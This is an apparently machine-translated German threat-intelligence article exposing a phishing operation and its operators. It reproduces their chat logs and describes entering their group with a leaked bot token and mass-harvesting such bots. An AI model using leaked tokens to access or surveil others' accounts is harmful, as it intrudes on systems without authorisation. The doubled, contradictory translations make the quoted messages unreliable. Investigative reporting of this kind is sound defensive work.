Und er sagt, die Karte sei kaputtgegangen und er habe kein Geld mehr.Und er sagt, die Karte sei blockiert, er habe kein Geld.
B
Bonya2024-06-16 17:08
Einem Mann wurden 60 Riesen gezahlt, sie ging hin, um zu schießen.Einem Mann wurden 60k überwiesen, woraufhin sie loszog, um das zu filmen.
B
Bonya2024-06-16 17:07
Du wirst mir also die Fakten nennen.Also begründe das bitte anhand der Fakten.
B
Bonya2024-06-16 17:07
Also, wer zum Teufel ist schuld, wer ist der Versager, der ich bin?Also, wer zum Teufel ist schuld, wer ist hier der Trottel – ich?
B
Bonya2024-06-16 17:07
Hast du nichts zu sagen?Gibt es nichts zu sagen?
B
Bonya2024-06-16 17:07
Oder ich konnte die verdammte PIN nicht eingeben.Oder dass ich es mit meinen verdammt krummen Händen nicht geschafft habe, die Pins einzugeben
B
Bonya2024-06-16 17:06
Wie zum Teufel kann ein Geldautomat die Karte einklemmen?Wie zum Teufel konnte der Geldautomat die Karte verschlucken?
B
Bonya2024-06-16 17:06
TrottelUnterdruckstellen
B
Bonya2024-06-16 17:06
Und du holst dir für sie einen runter.Und warum zum Teufel ladet ihr hier ihre Sachen runter?
B
Bonya2024-06-16 17:06
Ihr verdammten Naturtalente seid verdammte Idioten. Da sitzt eine verdammte Frau hier und hantiert mit ihrem Geld herum, und ihre Karte wurde vom Geldautomaten verschluckt.Mann, ihr seid ja echt total bescheuert – da sitzt so ein Scheißkerl bei euch, der die Oma verarscht, weil der Geldautomat ihre Karte verschluckt hat.
B
Bonya2024-06-16 16:40
@kysia1987 – Der Betrug hat nicht funktioniert, ich habe einen Dropkick verpasst und bin mit 60k fusioniert@kysia1987 – Das ist ein Scam, ich habe eine kleine Summe investiert und 60k verloren.

MONETTI ESCOBAR: Der stille Chef

Im krassen Gegensatz zu Bonyas 261 Beiträgen hat MONETTI nur 10 öffentliche Nachrichten — alles in einem einzigen Thread auf TraFFeeQ-Chat (Arbitrage mit schwarzem ADS-/SEO-Traffic), zur Verteidigung eines Kollegen:

TraFFeeQ-ChatDez. 2025
„Ein Mann macht seinen Job, er wird dafür bezahlt – was gibt’s da zu diskutieren?“
Ein Mensch macht seine Arbeit, wird dafür bezahlt – was gibt es da zu diskutieren?)
Kriminelle Tätigkeiten als „einfach nur einen Job“ normalisieren
TraFFeeQ-ChatDez. 2025
„Mit dir gibt es nichts zu besprechen.“
Mit dir gibt es nichts zu besprechen
Abweisende Autorität – Chefmentalität, jenseits jeder Diskussion
TraFFeeQ-ChatDez. 2025
„Es gibt noch genug anderes zu tun außer dir!“
Ohne dich gibt es genug zu tun)
Dies bedeutet, dass mehrere gleichzeitig ablaufende Vorgänge seine Aufmerksamkeit erfordern

MONETTIs [REDACTED]-Gruppen erzählen den Rest: Medusa Google Ads (Black-Hat-PPC-Betrug), ein Deepfakes-Kanal (synthetische Datenträger für Betrugszwecke) sowie MARLBORO-CHAT (privat, unbekannt). Das [REDACTED]-Premium-Abonnement, Geschäftszeiten rund um die Uhr und „Есть предложение“ („Ich habe einen Vorschlag“) Die Unternehmensbiografie zeichnet das Bild einer Person, die Cyberkriminalität als Vollzeitbeschäftigung betreibt.

MONETTI ESCOBAR: Vollständiges Nachrichtenprotokoll (10 Nachrichten)
MONETTI ESCOBAR (@monettiescobar) — Vollständiger übersetzter Nachrichtenverlauf
-- TraFFeeQ-Chat | Traffic-Arbitrage | Black ADS/SEO | (9 Beiträge) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Lass es sein!Lass das sein!
ME
MONETTI ESCOBAR2025-12-06 20:42
Ein Mann macht seine ArbeitDer Mann geht seiner Arbeit nach.
ME
MONETTI ESCOBAR2025-12-06 20:42
Keine AggressionKeine Aggression
ME
MONETTI ESCOBAR2025-12-06 20:40
Mach dir darüber auch keine SorgenMach dir darüber auch keine Sorgen
ME
MONETTI ESCOBAR2025-12-06 20:39
Sprich mit ihm, Mann. Das ist ihm ja nicht verboten.Unterhalte dich mal mit ihm, Mann, ihm wurde das ja nicht verboten.
ME
MONETTI ESCOBAR2025-12-06 20:39
Es gibt noch jede Menge andere Dinge zu tun (außer dir!)Es gibt noch genug andere Dinge zu tun außer dir!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Da gibt es nichts mit dir zu besprechenMit dir gibt es nichts zu besprechen
ME
MONETTI ESCOBAR2025-12-06 20:38
Es steht neben seinem Spitznamen. Du musst nicht darauf tippen, du wirst es schon lesen.Neben seinem Nickname steht: „Nicht darauf klicken“, lies es dir durch.
ME
MONETTI ESCOBAR2025-12-06 20:38
Der Mann macht seinen Job, er wird dafür bezahlt (gerne zur Diskussion)Jemand macht seine Arbeit, bekommt dafür Geld – wenn es dir gefällt, diskutiere mit!)
-- Medusa | Google Ads | Chat (1 Nachricht) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
MONETTI ESCOBAR – [REDACTED]-Profil
Screenshot 2 – MONETTIs [REDACTED]-Profil.
Bonya [REDACTED]-Profil
Screenshot 3 – Bonyas Profil. Beachten Sie DC2 (Amsterdam).

Kapitel 7: Der Panikraum

Nachdem THE ENABLERS REGISTRY über den öffentlich zugänglichen [REDACTED]-Bot Zugriff auf die Betreibergruppe erlangt hatte, kam es zu folgendem Austausch. Das nachstehende Chat-Protokoll wurde ins Englische übersetzt, wobei der russische Originaltext kursiv beibehalten wurde. Die für den Zugriff verwendete Identität wurde unkenntlich gemacht.

Operator-Gruppe – „Idr-Karte“ – Vollständiges Chat-Protokoll (61 Nachrichten)
— REDACTED hat sich über ein offengelegtes Bot-Token angemeldet —
R
ZENSURIERT25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
WerWer
B
Bonya25-03-2026 13:07:14
XzKeine Ahnung
R
ZENSURIERT25-03-2026 13:07:14
Hallo, speichere einfach deine Daten – warte eine Minute.
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Was zum Teufel?Was zum Teufel
B
Bonya25-03-2026 13:07:27
ScheißeFicken
B
Bonya25-03-2026 13:07:28
Das ist erWer denn?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Aha.Ahaha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Was zum Teufel?Was zum Teufel…
B
Bonya25-03-2026 13:07:53
Der Bot wurde gehackt.Der Bot wurde geknackt
B
Bonya25-03-2026 13:08:16
Mir wurde gesagt, unsere Abwehr sei total im Eimer.Mir wurde übrigens gesagt, dass unser Schutz verdammt stark ist.
B
Bonya25-03-2026 13:08:22
Na ja, es gibt da eine ArtNa ja, so ein Typ eben
B
Bonya25-03-2026 13:08:43
Das ist so, als würde man einen Bot über einen Possibly phishing-Angriff knacken.Bei uns ist es ein Kinderspiel, den Bot über Fish zu knacken – so einfach wie zwei Finger aneinanderzuschlagen
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[GESCHWÄRZT].[GESCHWÄRZT]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Wer ist das?Wer ist das?
B
Bonya25-03-2026 13:10:29
Überprüfe dein Profil.Schau dir mal das Profil an
B
Bonya25-03-2026 13:10:32
Das ist ein HackerDas ist ein Hacker
B
Bonya25-03-2026 13:10:35
Im wahrsten Sinne des Wortes.Im wörtlichen Sinne
B
Bonya25-03-2026 13:10:41
Übersetzt, was er channeltÜbersetzt: Was er im Kanal schreibt
B
Bonya25-03-2026 13:10:55
[GESCHWÄRZT — Bonya kopiert die Nachricht aus dem Kanal, in dem ihre Domain gemeldet wurde, und fügt sie ein, um herauszufinden, wer sie gemeldet hat]
B
Bonya25-03-2026 13:12:19
Also, äh.Na ja, was soll’s
B
Bonya25-03-2026 13:12:23
Ich hab keine Ahnung, wer das ist.Ich hab keine Ahnung, wer das ist
B
Bonya25-03-2026 13:12:25
Aber nicht für immerAber das ist kein gutes Zeichen
B
Bonya25-03-2026 13:12:47
@devosus: Denk mal an die Verteidigung, bevor wir ordentlich eins auf die Mütze bekommen.@devosus, denk mal über den Schutz nach, bevor uns jemand den Arsch aufreißt
Anmerkung der Redaktion: Bonya spürt, dass es so kommt. Nehmen wir einmal an, er sei Russe und halte es für „patriotisch“, die Ukraine zu betrügen. Wie sieht es dann mit Indonesien aus – einem BRICS-Partner seit Oktober 2024 (Gipfeltreffen in Kasan)? Ist es auch patriotisch, die Bürger der eigenen Verbündeten zu bestehlen? Betrüger aus der GUS sind Diebe, die niemanden verschonen – sie haben weder Verstand noch Loyalität. Lesen Sie unsere weiteren Recherchen, in denen wir dokumentiert haben, Strafverfahren Bei ähnlichen Operatoren ist das Ergebnis immer dasselbe.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Ja, das kann ich nachvollziehen.Ja, ich sehe es
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Fick dich.Was redest du da für einen Blödsinn?
B
Bonya25-03-2026 13:13:09
Na ja, es ist auch nicht gerade ein Riesenspaß, wenn einem die Energie ausgeht.Na ja, zusammen zu sein ist auch nicht gerade der Hammer.
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Er wird nichts tun.Er wird nichts tun.
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Was wird er wohl tun?Was wird er verraten?
D
Devoys25-03-2026 13:13:26
Was das istWas das ist
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Ja, da ist jemand beigetretenDa ist jemand beigetreten
D
Devoys25-03-2026 13:13:34
woherwoher
B
Bonya25-03-2026 13:13:35
Auch wenn du dich ein paar Mal mit deiner eigenen IP-Adresse auf der Possibly phishing-Seite angemeldet hast, ist das jetzt nicht mehr in Ordnung.Selbst wenn ich schon ein paar Mal von meiner IP-Adresse aus auf Fish zugegriffen habe, macht das keinen Spaß mehr
ME
MONETTI ESCOBAR25-03-2026 13:13:37
An die GruppeZur Gruppe
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzKeine Ahnung
D
Devoys25-03-2026 13:13:39
bei der Interpolationwenn bei Interpol
D
Devoys25-03-2026 13:13:41
zu demzu welcher
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Dieses hierDiese
B
Bonya25-03-2026 13:13:46
Ich bin nur hierhergekommen, um ein bisschen zu plaudernHier im Chat bin ich gerade reingeschaut
B
Bonya25-03-2026 13:13:49
Er schrieb, dassEr schrieb:
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Hallo, speichere einfach deine Daten – warte eine Minute.
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto geteilt]
D
Devoys25-03-2026 13:14:31
Die habe ich schon mal gesehen.So etwas habe ich schon gesehen
B
Bonya25-03-2026 13:14:44
Tja, wir sind auch wegen des „ukr“-Bots aufgeflogen.Na ja, uns haben sie über den ukrainischen Bot fertiggemacht
B
Bonya25-03-2026 13:14:55
Du hast im Chatraum keine Nachricht geschrieben.Das wurde gerade nicht im Chat geschrieben
B
Bonya25-03-2026 13:14:57
Hast du nicht geschrieben,Aber nein, sie haben geschrieben
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Das ist mir scheißegal.Ach, scheiß drauf
B
Bonya25-03-2026 13:15:06
Im Namen des SendersIm Namen des Kanals
D
Devoys25-03-2026 13:15:23
Vergiss das doch einfach mal.Ach, scheiß drauf
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Ich mache diese Gruppe kaputtIch lösche diese Gruppe.
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
jaja
— Gruppe vom Eigentümer gelöscht —

Die Gruppe wurde innerhalb weniger Minuten gelöscht. Bonyas abschließendes „+“ und Devoys Bestätigung „ja“ sagen schon alles: Sie wussten, dass sie entlarvt waren, und ihre einzige Möglichkeit bestand darin, die Beweise zu vernichten. Doch zu diesem Zeitpunkt waren die Daten bereits erfasst worden.

Beachten Sie Bonyas aufschlussreiche Bemerkung: „Wir wurden auch über den ukrainischen Bot angegriffen.“ — was bestätigt, dass beide Projekte (das ukrainische und das indonesische) dasselbe Betreiberteam haben und dass dies nicht das erste Mal war, dass ihre Infrastruktur kompromittiert wurde.

Abschnitt 8: Was dies verdeutlicht

So funktioniert THE ENABLERS REGISTRY

Jede Domain, die auf enablers.report durchläuft diese automatisierte Pipeline. [REDACTED][.]sbs bildete da keine Ausnahme.

Erkennung
Statische Analyse
Infrastrukturkartierung
Entdeckung des Ursprungs
OSINT
Berichterstellung

Zeitplan der Ermittlungen

20. März 2026
Domäne [REDACTED][.]sbs registriert über IANA #3858
21. März 2026
Erkannt durch die automatisierte Überwachungs-Pipeline von THE ENABLERS REGISTRY
21. März 2026
Vollautomatische Analyse abgeschlossen: Infrastruktur erfasst, JS-Bundle entschlüsselt, WebSocket-Protokoll dokumentiert
22. März 2026
IP-Adresse des Ursprungs identifiziert. Zweites Possibly phishing-Projekt („HealthCare ID“) auf demselben Server entdeckt
22. März 2026
Enthüllt config.json führt zur Identifizierung des Betreibers über die [REDACTED]-Bot-API
23. März 2026
Meldungen über Missbrauch, die beim Hosting-Anbieter, bei IANA #1910 und bei den zuständigen CERTs eingereicht wurden
25. März 2026
Artikel veröffentlicht. Domain-Berichte sind auf THE ENABLERS REGISTRY verfügbar

Wie das möglich war: Das Bot-Intelligenz-Netzwerk von THE ENABLERS REGISTRY

Diese Untersuchung wurde vollständig durchgeführt von automatisierte Systeme. Die Pipeline von THE ENABLERS REGISTRY erkennt nicht nur Possibly phishing-Domains – sie dringt auch in die Infrastruktur der Betreiber hinter diesen Domains ein.

2,000+
[REDACTED]-Bots gesammelt
Aktiv
Einige Bots werden weiterhin überwacht
Seit 2024
Kollektion läuft

Wenn Possibly phishing-Kits [REDACTED]-Bot-Token offenlegen – wie es bei diesem hier der Fall war durch config.json — Unser System erfasst diese automatisch, ordnet sie den Bedienergruppen zu, extrahiert Mitgliederlisten und archiviert den Nachrichtenverlauf. Über 2.000 Bots werden seit 2024 auf diese Weise gesammelt. Einige sind noch immer aktiv, und wir genießen es, den Tätern in Echtzeit bei ihrer Arbeit zuzusehen – denn das Ende steht bereits fest.

Selbst Betreiber, die ihre Konten löschen oder ihre Gruppen auflösen, kommen zu spät. Wenn sie in Panik geraten, haben wir bereits alles – Nachrichtenarchive, Profildaten, Gruppenmitgliedschaften, verbundene Bots. Das Löschen ändert nichts. Die Daten waren vorhanden, und nun befinden sie sich in unserer Datenbank.

„Warte auf mich“ – Betrüger-Edition

Dieser Fall ist kein Einzelfall – er ist ein Paradebeispiel für systematische Nachlässigkeit seitens IANA #3765 den wir als Beispiel für „Mega-Hacker“ vorstellen wollten. Wie „Типичный Мошенник“ zu Recht angemerkt hat: Es gibt einen Unterschied zwischen Hackern und Betrügern — Intelligenz. Diese Betreiber sind weder Hacker noch besonders schlau.

Die Systeme von THE ENABLERS REGISTRY sammeln automatisch solche Beweise über Tausende von Domains hinweg – sie erfassen Bots, archivieren die Kommunikation der Betreiber und erstellen eine Übersicht über die Infrastruktur. Dieser spezielle Fall war einfach zu absurd, um ihn nicht zu veröffentlichen. Das Possibly phishing-Kit ist Standardware, OPSEC fehlt gänzlich, und die Betreiber haben ihre Gruppe innerhalb weniger Minuten nach der Entdeckung in ihrer Panik gelöscht.

Wir entwickeln ein System, das Folgendes anzeigen wird: Verifizierte Betreiberidentitäten direkt auf den Domain-Berichtsseiten — vom Betrüger zum Opfer, wie in der russischen Fernsehsendung „Жди Меня“ (Warte auf mich), nur umgekehrt. Die Sendung läuft seit 2024 im geschlossenen Modus. Viele Betreiber sind bereits identifiziert worden – darunter auch solche, die ihre Konten gelöscht haben. Wir entscheiden gerade, welche die wichtigsten sind interessant Eine Möglichkeit, das zu präsentieren. Bleibt dran.

Verwandte Domains

Unsere Analyse ergab einen zweiten Bereich — hlpforvpeople[.]sbs — die über denselben Registrar registriert wurden und übereinstimmende Infrastrukturmuster aufweisen. Beide Domains sind in unserer Datenbank erfasst:

Nichteinhaltung der Vorschriften durch den Registrar: IANA #3858

[REDACTED] (Hongkong) hat mehrere detaillierte Missbrauchsberichte von THE ENABLERS REGISTRY zu beiden Themen [REDACTED][.]sbs und hlpforvpeople[.]sbs. Zum Zeitpunkt der Veröffentlichung — 5 Tage nach der ersten Meldung — Es wurden keine Maßnahmen ergriffen. Beide Domains sind weiterhin voll funktionsfähig.

Dies ist kein Einzelfall. IANA #3765 ist ein immer wiederkehrendes Problem bei unseren Untersuchungen. Die Kontaktadresse der Registrierungsstelle für Missbrauchsfälle (abuse@IANA #3765) reagiert durchweg nicht auf mit Beweisen untermauerte Possibly phishing-Meldungen. Obwohl IANA #3765 ein von der ICANN akkreditierter Registrar ist, der an die Bestimmungen des Registrar Accreditation Agreement (RAA §3.18) gebunden ist, agiert das Unternehmen offenbar ungestraft.

IANA #3765 ist auf Russisch vertreten und vertreibt .ru Domains zu Premiumpreisen (~200 $) und kommuniziert mit Kunden über VK und [REDACTED] – Plattformen, die bei russischsprachigen Nutzern beliebt sind. Die Überschneidung ihres Kundenstamms mit Untergrund-Communities wirft ernsthafte Fragen auf, ob die Nichtbeantwortung von Missbrauchsmeldungen durch den Registrar auf Fahrlässigkeit oder auf eine bewusste Geschäftsstrategie zurückzuführen ist.

Diese Untersuchung wurde teilweise veröffentlicht aufgrund der anhaltenden Untätigkeit von IANA #3765. Wenn Registrare sich weigern, gegen Possibly phishing-Missbrauch vorzugehen, bleibt die öffentliche Anprangerung als einziger Mechanismus zur Rechenschaftspflicht übrig.

Die wichtigsten Erkenntnisse

  • Nur durch Automatisierung kann man Schritt halten. Possibly phishing-Kits werden innerhalb weniger Stunden bereitgestellt und als Angriffsmittel eingesetzt. Eine manuelle Überprüfung lässt sich nicht in dem erforderlichen Umfang durchführen.
  • Bediener machen Fehler. Eine ungeschützte Konfigurationsdatei in einem Nebenprojekt führte zur Aufdeckung einer ganzen multinationalen Possibly phishing-Operation. Es ist schwierig, in jedem Projekt eine lückenlose OPSEC aufrechtzuerhalten.
  • Social Engineering entwickelt sich mit dem Nachrichtenzyklus weiter. Krieg, humanitäre Hilfe und staatliche Programme werden zunehmend als Vorwand für Possibly phishing-Angriffe ausgenutzt, da sie sich an Menschen in Not richten, die die Legitimität solcher Angebote weniger hinterfragen.
  • Die Wiederverwendung von Infrastruktur ist die Regel. Ein Server, zwei Possibly phishing-Projekte, zwei Länder, dieselben Betreiber. Die Darstellung der Verbindungen innerhalb der Infrastruktur liefert weitaus mehr Erkenntnisse als die isolierte Analyse einer einzelnen Domain.

Verwandte Forschungsarbeiten

Weitere Untersuchungen aus der automatisierten Informationspipeline von THE ENABLERS REGISTRY

[REDACTED]-Panel aufgedeckt
Ein Hackerangriff auf das Admin-Panel deckt eine länderübergreifende Krypto-Possibly phishing-Operation auf, bei der Chat-Protokolle der Betreiber offengelegt wurden.
Krypto-Drainer-Netzwerke aufgedeckt
Aufdeckung der Infrastruktur hinter Possibly phishing-Kits, die auf DeFi-Nutzer abzielen und deren Wallets leeren.
IANA #3765: Ein Registrar, der Cyberkriminalität begünstigt
Wie ein von der ICANN akkreditierter Registrar Missbrauchsmeldungen systematisch ignoriert – auch im Rahmen dieser Untersuchung.
[REDACTED] entlarvt: 10 Jahre gestohlene Schlüssel
Ein jahrzehntelanger Betrug mit Monero-Wallets wurde durch JavaScript-Analyse und Domain-Forensik aufgedeckt.
Betrugsinfrastruktur aufgedeckt
Gemeinsam genutztes Hosting, gemeinsame Betreiber – wie Possibly phishing-Netzwerke ihre Infrastruktur kampagnenübergreifend wiederverwenden.
[REDACTED] Drainer entlarvt
Ein auf TRON basierender Energiebetrug, der durch die Genehmigung bösartiger Smart Contracts Geld aus den Wallets abzieht.

Haftungsausschluss: Diese Untersuchung wurde ausschließlich mittels passiver Aufklärung und öffentlicher APIs durchgeführt. Es erfolgte kein unbefugter Zugriff auf irgendein System. Bei den Aufrufen der [REDACTED]-Bot-API wurde ein Token verwendet, das von den Betreibern in einem nicht authentifizierten Endpunkt öffentlich zugänglich gemacht worden war. Alle Domainnamen in diesem Artikel wurden gemäß der üblichen InfoSec-Konvention unkenntlich gemacht.

Diese Untersuchung teilen

Verwandte Ermittlungen

GRÜNDLICHE UNTERSUCHUNG
Anatomie des Krypto-Phishings: 8 echte Seed-Phrase-Stealer im Rückentwicklungsverfahren analysiert
UNTERSUCHUNG
Betrüger entlarvt: 4 Betrugs-Backends unter der Lupe
UNTERSUCHUNG
$0 Takedowns: How We Disrupt Possibly phishing Infrastructure

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings